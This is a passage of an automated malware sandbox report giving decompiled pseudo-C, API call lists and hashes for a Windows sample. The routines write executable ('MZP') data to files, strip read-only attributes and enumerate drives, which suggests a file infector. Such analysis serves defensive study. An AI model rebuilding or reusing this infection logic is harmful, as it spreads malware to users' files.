                                                                                                                          0x00404bf4
                                                                                                                          0x00404bf7

                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 3934441357-2889622443
                                                                                                                          • Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                                                                          • Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
                                                                                                                          • Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                                                                                          • Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401E74, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                                                                            • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                                                                            • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                                                                            • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2227675388-0
                                                                                                                          • Opcode ID: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                                                                          • Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
                                                                                                                          • Opcode Fuzzy Hash: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                                                                                          • Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00407BD4, Relevance: 3.1, APIs: 2, Instructions: 114COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E00407BD4(void* __eax, void* __ebx, void* __esi) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				char _v40258;
				char _v41492;
				char _v41496;
				void* _t35;
				void* _t53;
				void* _t58;
				CHAR* _t88;
				intOrPtr _t101;
				intOrPtr _t111;
				void* _t114;
				void* _t115;
				intOrPtr _t116;

				_t87 = __ebx;
				_t114 = _t115;
				_push(__eax);
				_t35 = 0xa;
				do {
					_t115 = _t115 + 0xfffff004;
					_push(_t35);
					_t35 = _t35 - 1;
					_t117 = _t35;
				} while (_t35 != 0);
				_t116 = _t115 + 0xfffffdf0;
				_push(__ebx);
				_v41496 = 0;
				E004033FC(_v8);
				_push(_t114);
				_push(0x407d8d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116;
				E004031F4( &_v41496, 3, 0x4091c0);
				_t100 = _v41496;
				if(E00406FE4(_v8, __ebx, _v41496, _t117) == 0) {
					L10:
					__eflags = 0;
					_pop(_t101);
					 *[fs:eax] = _t101;
					_push(E00407D94);
					E00403094( &_v41496);
					return E00403094( &_v8);
				} else {
					_t53 = E0040258C( *_v8) + 0xbf - 2;
					if(_t53 < 0) {
						goto L10;
					} else {
						_t120 = _t53 == 0x19;
						if(_t53 == 0x19) {
							goto L10;
						} else {
							E00407AD0(_v8, _t87, __esi, _t120); // executed
							_t58 = E00407130(_v8, _t87); // executed
							if(_t58 == 0) {
								goto L10;
							} else {
								_t88 = E0040340C(_v8);
								_v12 = GetFileAttributesA(_t88);
								_t122 = _v12 & 0x00000001;
								if((_v12 & 0x00000001) > 0) {
									SetFileAttributesA(_t88, 0);
								}
								_v16 = E00405B84(_v8, _t100, _t122);
								_push(_t114);
								_push(0x407d4a);
								_push( *[fs:eax]);
								 *[fs:eax] = _t116;
								E0040597C(_v16);
								E00405974();
								E00405988(_v16);
								E0040254C( &_v40258, 4,  &_v20);
								E00407080( &_v41492, _v20, 0x3e8);
								E00405974();
								E0040598C(_v16);
								E0040597C(_v16);
								E00405980(_v16);
								_pop(_t111);
								 *[fs:eax] = _t111;
								_push(E00407D51);
								return E00404520(_v16);
							}
						}
					}
				}
			}



















                                                                                                                          0x00407bd4
                                                                                                                          0x00407bd5
                                                                                                                          0x00407bd7
                                                                                                                          0x00407bd8
                                                                                                                          0x00407bdd
                                                                                                                          0x00407bdd
                                                                                                                          0x00407be3
                                                                                                                          0x00407be4
                                                                                                                          0x00407be4
                                                                                                                          0x00407be4
                                                                                                                          0x00407bea
                                                                                                                          0x00407bf0
                                                                                                                          0x00407bf3
                                                                                                                          0x00407bff
                                                                                                                          0x00407c06
                                                                                                                          0x00407c07
                                                                                                                          0x00407c0c
                                                                                                                          0x00407c0f
                                                                                                                          0x00407c22
                                                                                                                          0x00407c27
                                                                                                                          0x00407c37
                                                                                                                          0x00407d6c
                                                                                                                          0x00407d6c
                                                                                                                          0x00407d6e
                                                                                                                          0x00407d71
                                                                                                                          0x00407d74
                                                                                                                          0x00407d7f
                                                                                                                          0x00407d8c
                                                                                                                          0x00407c3d
                                                                                                                          0x00407c49
                                                                                                                          0x00407c4b
                                                                                                                          0x00000000
                                                                                                                          0x00407c51
                                                                                                                          0x00407c51
                                                                                                                          0x00407c53
                                                                                                                          0x00000000
                                                                                                                          0x00407c59
                                                                                                                          0x00407c5c
                                                                                                                          0x00407c64
                                                                                                                          0x00407c6b
                                                                                                                          0x00000000
                                                                                                                          0x00407c71
                                                                                                                          0x00407c79
                                                                                                                          0x00407c81
                                                                                                                          0x00407c84
                                                                                                                          0x00407c8b
                                                                                                                          0x00407c90
                                                                                                                          0x00407c90
                                                                                                                          0x00407c9d
                                                                                                                          0x00407ca2
                                                                                                                          0x00407ca3
                                                                                                                          0x00407ca8
                                                                                                                          0x00407cab
                                                                                                                          0x00407cb1
                                                                                                                          0x00407cc1
                                                                                                                          0x00407cd4
                                                                                                                          0x00407ce7
                                                                                                                          0x00407cfa
                                                                                                                          0x00407d04
                                                                                                                          0x00407d17
                                                                                                                          0x00407d1f
                                                                                                                          0x00407d2f
                                                                                                                          0x00407d36
                                                                                                                          0x00407d39
                                                                                                                          0x00407d3c
                                                                                                                          0x00407d49
                                                                                                                          0x00407d49
                                                                                                                          0x00407c6b
                                                                                                                          0x00407c53
                                                                                                                          0x00407c4b

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00407D8D), ref: 00407C7C
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 00407C90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: b5eb93d17ee822dbc2cfe60c370f870a49ec75f8fbc2fd949dadd44c38c3286c
                                                                                                                          • Instruction ID: 984d91ffacc30f0f747519396fe1a4ca6018efb205f81ccdb5163335beaf5ee0
                                                                                                                          • Opcode Fuzzy Hash: b5eb93d17ee822dbc2cfe60c370f870a49ec75f8fbc2fd949dadd44c38c3286c
                                                                                                                          • Instruction Fuzzy Hash: C6417170E046089FDB10EB69CD929AEB7B5EF45304F1044B7F414B73D2DA39AE058E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402FA4, Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402FA4() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0040A648 != 0 ||  *0x40a030 == 0) {
					L3:
					if( *0x409004 != 0) {
						E00402E8C();
						E00402F18(_t32);
						 *0x409004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x40a648)) == 2 &&  *0x409000 == 0) {
							 *0x0040A62C = 0;
						}
						E00402D8C();
						if( *((char*)(0x40a648)) <= 1 ||  *0x409000 != 0) {
							_t14 =  *0x0040A630;
							if( *0x0040A630 != 0) {
								E00403C00(_t14);
								_t35 =  *((intOrPtr*)(0x40a630));
								_t7 = _t35 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00402D64();
						if( *((char*)(0x40a648)) == 1) {
							 *0x0040A644();
						}
						if( *((char*)(0x40a648)) != 0) {
							E00402EE8();
						}
						if( *0x40a620 == 0) {
							if( *0x40a018 != 0) {
								 *0x40a018();
							}
							ExitProcess( *0x409000); // executed
						}
						memcpy(0x40a620,  *0x40a620, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x409000 = 0x409000;
					}
				} else {
					do {
						 *0x40a030 = 0;
						 *((intOrPtr*)( *0x40a030))();
					} while ( *0x40a030 != 0);
					goto L3;
				}
			}







                                                                                                                          0x00402fbb
                                                                                                                          0x00402fd3
                                                                                                                          0x00402fda
                                                                                                                          0x00402fdc
                                                                                                                          0x00402fe1
                                                                                                                          0x00402fe8
                                                                                                                          0x00402fe8
                                                                                                                          0x00000000
                                                                                                                          0x00402fed
                                                                                                                          0x00402ff1
                                                                                                                          0x00402ffa
                                                                                                                          0x00402ffa
                                                                                                                          0x00402ffd
                                                                                                                          0x00403006
                                                                                                                          0x0040300d
                                                                                                                          0x00403012
                                                                                                                          0x00403014
                                                                                                                          0x00403019
                                                                                                                          0x0040301c
                                                                                                                          0x0040301c
                                                                                                                          0x0040301f
                                                                                                                          0x00403022
                                                                                                                          0x00403029
                                                                                                                          0x00403029
                                                                                                                          0x00403022
                                                                                                                          0x00403012
                                                                                                                          0x0040302e
                                                                                                                          0x00403037
                                                                                                                          0x00403039
                                                                                                                          0x00403039
                                                                                                                          0x00403040
                                                                                                                          0x00403042
                                                                                                                          0x00403042
                                                                                                                          0x0040304a
                                                                                                                          0x00403053
                                                                                                                          0x00403055
                                                                                                                          0x00403055
                                                                                                                          0x0040305e
                                                                                                                          0x0040305e
                                                                                                                          0x0040306f
                                                                                                                          0x0040306f
                                                                                                                          0x00403071
                                                                                                                          0x00403071
                                                                                                                          0x00402fc2
                                                                                                                          0x00402fc2
                                                                                                                          0x00402fc8
                                                                                                                          0x00402fcc
                                                                                                                          0x00402fce
                                                                                                                          0x00000000
                                                                                                                          0x00402fc2

                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 00403029
                                                                                                                          • ExitProcess.KERNEL32(00000000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 0040305E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404682716-0
                                                                                                                          • Opcode ID: ab20704e86a3c794a86d4a60a2f3f790aa59cc74fa6ee8820611fb12759a24f3
                                                                                                                          • Instruction ID: 25a4abd2e023ddac5d936c147021e49c52e2d721a9332ed2c08f3b56dfe932ed
                                                                                                                          • Opcode Fuzzy Hash: ab20704e86a3c794a86d4a60a2f3f790aa59cc74fa6ee8820611fb12759a24f3
                                                                                                                          • Instruction Fuzzy Hash: 77218E709012018BEB20AF65C6887537AE9AF44355F24447BD844A72D6D7BCCDC0DBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402F9C, Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402F9C() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0040A648 != 0 ||  *0x40a030 == 0) {
					L5:
					if( *0x409004 != 0) {
						E00402E8C();
						E00402F18(_t36);
						 *0x409004 = 0;
					}
					L7:
					if( *((char*)(0x40a648)) == 2 &&  *0x409000 == 0) {
						 *0x0040A62C = 0;
					}
					E00402D8C();
					if( *((char*)(0x40a648)) <= 1 ||  *0x409000 != 0) {
						_t17 =  *0x0040A630;
						if( *0x0040A630 != 0) {
							E00403C00(_t17);
							_t39 =  *((intOrPtr*)(0x40a630));
							_t7 = _t39 + 0x10; // 0x0
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00402D64();
					if( *((char*)(0x40a648)) == 1) {
						 *0x0040A644();
					}
					if( *((char*)(0x40a648)) != 0) {
						E00402EE8();
					}
					if( *0x40a620 == 0) {
						if( *0x40a018 != 0) {
							 *0x40a018();
						}
						ExitProcess( *0x409000); // executed
					}
					memcpy(0x40a620,  *0x40a620, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x409000 = 0x409000;
					goto L7;
				} else {
					do {
						 *0x40a030 = 0;
						 *((intOrPtr*)( *0x40a030))();
					} while ( *0x40a030 != 0);
					goto L5;
				}
			}








                                                                                                                          0x00402f9e
                                                                                                                          0x00402fbb
                                                                                                                          0x00402fd3
                                                                                                                          0x00402fda
                                                                                                                          0x00402fdc
                                                                                                                          0x00402fe1
                                                                                                                          0x00402fe8
                                                                                                                          0x00402fe8
                                                                                                                          0x00402fed
                                                                                                                          0x00402ff1
                                                                                                                          0x00402ffa
                                                                                                                          0x00402ffa
                                                                                                                          0x00402ffd
                                                                                                                          0x00403006
                                                                                                                          0x0040300d
                                                                                                                          0x00403012
                                                                                                                          0x00403014
                                                                                                                          0x00403019
                                                                                                                          0x0040301c
                                                                                                                          0x0040301c
                                                                                                                          0x0040301f
                                                                                                                          0x00403022
                                                                                                                          0x00403029
                                                                                                                          0x00403029
                                                                                                                          0x00403022
                                                                                                                          0x00403012
                                                                                                                          0x0040302e
                                                                                                                          0x00403037
                                                                                                                          0x00403039
                                                                                                                          0x00403039
                                                                                                                          0x00403040
                                                                                                                          0x00403042
                                                                                                                          0x00403042
                                                                                                                          0x0040304a
                                                                                                                          0x00403053
                                                                                                                          0x00403055
                                                                                                                          0x00403055
                                                                                                                          0x0040305e
                                                                                                                          0x0040305e
                                                                                                                          0x0040306f
                                                                                                                          0x0040306f
                                                                                                                          0x00403071
                                                                                                                          0x00000000
                                                                                                                          0x00402fc2
                                                                                                                          0x00402fc2
                                                                                                                          0x00402fc8
                                                                                                                          0x00402fcc
                                                                                                                          0x00402fce
                                                                                                                          0x00000000
                                                                                                                          0x00402fc2

                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 00403029
                                                                                                                          • ExitProcess.KERNEL32(00000000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 0040305E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404682716-0
                                                                                                                          • Opcode ID: e87d145c5cbc11a3b1b75d0fafe500ddba1f5edf94dcaa2e3019682a10fbe1e7
                                                                                                                          • Instruction ID: 4b2d42af59d3b1d8e88fe9e31da9e43e6ca94f4fbd885f656fef1c50f2c896c1
                                                                                                                          • Opcode Fuzzy Hash: e87d145c5cbc11a3b1b75d0fafe500ddba1f5edf94dcaa2e3019682a10fbe1e7
                                                                                                                          • Instruction Fuzzy Hash: 1C216D709013418BEB21AF65C6883537BA9AF45315F2444BBD844A72DAD7BCCDC4CBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402FA0, Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402FA0() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0040A648 != 0 ||  *0x40a030 == 0) {
					L4:
					if( *0x409004 != 0) {
						E00402E8C();
						E00402F18(_t35);
						 *0x409004 = 0;
					}
					L6:
					if( *((char*)(0x40a648)) == 2 &&  *0x409000 == 0) {
						 *0x0040A62C = 0;
					}
					E00402D8C();
					if( *((char*)(0x40a648)) <= 1 ||  *0x409000 != 0) {
						_t16 =  *0x0040A630;
						if( *0x0040A630 != 0) {
							E00403C00(_t16);
							_t38 =  *((intOrPtr*)(0x40a630));
							_t7 = _t38 + 0x10; // 0x0
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00402D64();
					if( *((char*)(0x40a648)) == 1) {
						 *0x0040A644();
					}
					if( *((char*)(0x40a648)) != 0) {
						E00402EE8();
					}
					if( *0x40a620 == 0) {
						if( *0x40a018 != 0) {
							 *0x40a018();
						}
						ExitProcess( *0x409000); // executed
					}
					memcpy(0x40a620,  *0x40a620, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x409000 = 0x409000;
					goto L6;
				} else {
					do {
						 *0x40a030 = 0;
						 *((intOrPtr*)( *0x40a030))();
					} while ( *0x40a030 != 0);
					goto L4;
				}
			}







                                                                                                                          0x00402fbb
                                                                                                                          0x00402fd3
                                                                                                                          0x00402fda
                                                                                                                          0x00402fdc
                                                                                                                          0x00402fe1
                                                                                                                          0x00402fe8
                                                                                                                          0x00402fe8
                                                                                                                          0x00402fed
                                                                                                                          0x00402ff1
                                                                                                                          0x00402ffa
                                                                                                                          0x00402ffa
                                                                                                                          0x00402ffd
                                                                                                                          0x00403006
                                                                                                                          0x0040300d
                                                                                                                          0x00403012
                                                                                                                          0x00403014
                                                                                                                          0x00403019
                                                                                                                          0x0040301c
                                                                                                                          0x0040301c
                                                                                                                          0x0040301f
                                                                                                                          0x00403022
                                                                                                                          0x00403029
                                                                                                                          0x00403029
                                                                                                                          0x00403022
                                                                                                                          0x00403012
                                                                                                                          0x0040302e
                                                                                                                          0x00403037
                                                                                                                          0x00403039
                                                                                                                          0x00403039
                                                                                                                          0x00403040
                                                                                                                          0x00403042
                                                                                                                          0x00403042
                                                                                                                          0x0040304a
                                                                                                                          0x00403053
                                                                                                                          0x00403055
                                                                                                                          0x00403055
                                                                                                                          0x0040305e
                                                                                                                          0x0040305e
                                                                                                                          0x0040306f
                                                                                                                          0x0040306f
                                                                                                                          0x00403071
                                                                                                                          0x00000000
                                                                                                                          0x00402fc2
                                                                                                                          0x00402fc2
                                                                                                                          0x00402fc8
                                                                                                                          0x00402fcc
                                                                                                                          0x00402fce
                                                                                                                          0x00000000
                                                                                                                          0x00402fc2

                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 00403029
                                                                                                                          • ExitProcess.KERNEL32(00000000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 0040305E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404682716-0
                                                                                                                          • Opcode ID: 13075f1f07cc84eb7334053c3716d9a8ce4deda8e863971867078cc8782122a9
                                                                                                                          • Instruction ID: 1b03414f8cc1a74ea96aefb4ecc0c7aba41324da9db28816bc81a4039e10204c
                                                                                                                          • Opcode Fuzzy Hash: 13075f1f07cc84eb7334053c3716d9a8ce4deda8e863971867078cc8782122a9
                                                                                                                          • Instruction Fuzzy Hash: D8217F709013418BEB20AF65C6883537BA8AF44315F24447BD844A62DAD3BCCDC0CB9E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040759C, Relevance: 3.1, APIs: 2, Instructions: 62synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 61%
                                                                                                                          			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* _t11;
				void* _t17;
				void* _t32;
				intOrPtr _t38;
				void* _t44;
				void* _t46;
				intOrPtr _t49;

				_t56 = __fp0;
				_t45 = __esi;
				_t48 = _t49;
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t49);
				_push(0x40765c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49; // executed
				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
				if(_t11 != 0) {
					_t40 = 0x14;
					E00407080(0x4091c8, 0x14, 0x14);
					_t17 = E00404018(0, 0, 0x4091c8); // executed
					_t44 = _t17;
					if(GetLastError() != 0xb7) {
						E00406D40( &_v8, __ebx, _t44, __esi); // executed
						_t32 = E0040320C(_v8);
						_t53 = _t32;
						if(_t32 > 0) {
							_t46 = 1;
							do {
								E004031B4();
								_t40 = 0x407674;
								E00403214( &_v12, 0x407674);
								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
								_pop(0x14);
								_t46 = _t46 + 1;
								_t32 = _t32 - 1;
								_t54 = _t32;
							} while (_t32 != 0);
						}
						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56); // executed
						ReleaseMutex(_t44);
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00407663);
				return E004030B8( &_v12, 2);
			}












                                                                                                                          0x0040759c
                                                                                                                          0x0040759c
                                                                                                                          0x0040759d
                                                                                                                          0x0040759f
                                                                                                                          0x004075a1
                                                                                                                          0x004075a3
                                                                                                                          0x004075a4
                                                                                                                          0x004075a5
                                                                                                                          0x004075a8
                                                                                                                          0x004075a9
                                                                                                                          0x004075ae
                                                                                                                          0x004075b1
                                                                                                                          0x004075b4
                                                                                                                          0x004075bb
                                                                                                                          0x004075cb
                                                                                                                          0x004075d0
                                                                                                                          0x004075de
                                                                                                                          0x004075e3
                                                                                                                          0x004075ef
                                                                                                                          0x004075f4
                                                                                                                          0x00407601
                                                                                                                          0x00407603
                                                                                                                          0x00407605
                                                                                                                          0x00407607
                                                                                                                          0x0040760c
                                                                                                                          0x00407617
                                                                                                                          0x0040761f
                                                                                                                          0x00407624
                                                                                                                          0x0040762c
                                                                                                                          0x00407631
                                                                                                                          0x00407632
                                                                                                                          0x00407633
                                                                                                                          0x00407633
                                                                                                                          0x00407633
                                                                                                                          0x0040760c
                                                                                                                          0x00407636
                                                                                                                          0x0040763c
                                                                                                                          0x0040763c
                                                                                                                          0x004075ef
                                                                                                                          0x00407643
                                                                                                                          0x00407646
                                                                                                                          0x00407649
                                                                                                                          0x0040765b

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                                                                                            • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 676290295-0
                                                                                                                          • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                                                                          • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                                                                                          • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                                                                          • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406D40, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
				char _v155;
				char _v160;
				int _t23;
				signed int _t37;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;

				_t50 = _t51;
				_v160 = 0;
				_t45 = __eax;
				_push(_t50);
				_push(0x406dfc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xffffff64;
				GetLogicalDriveStringsA(0x97,  &_v155); // executed
				_t37 = 0;
				while(_a12245929 != 0) {
					_t48 = _t37 & 0x000000ff;
					_t23 = GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97); // executed
					if(_t23 != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) {
						E004031B4();
						E00403214(_t45, _v160);
					}
					_t37 = _t37 + 4;
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
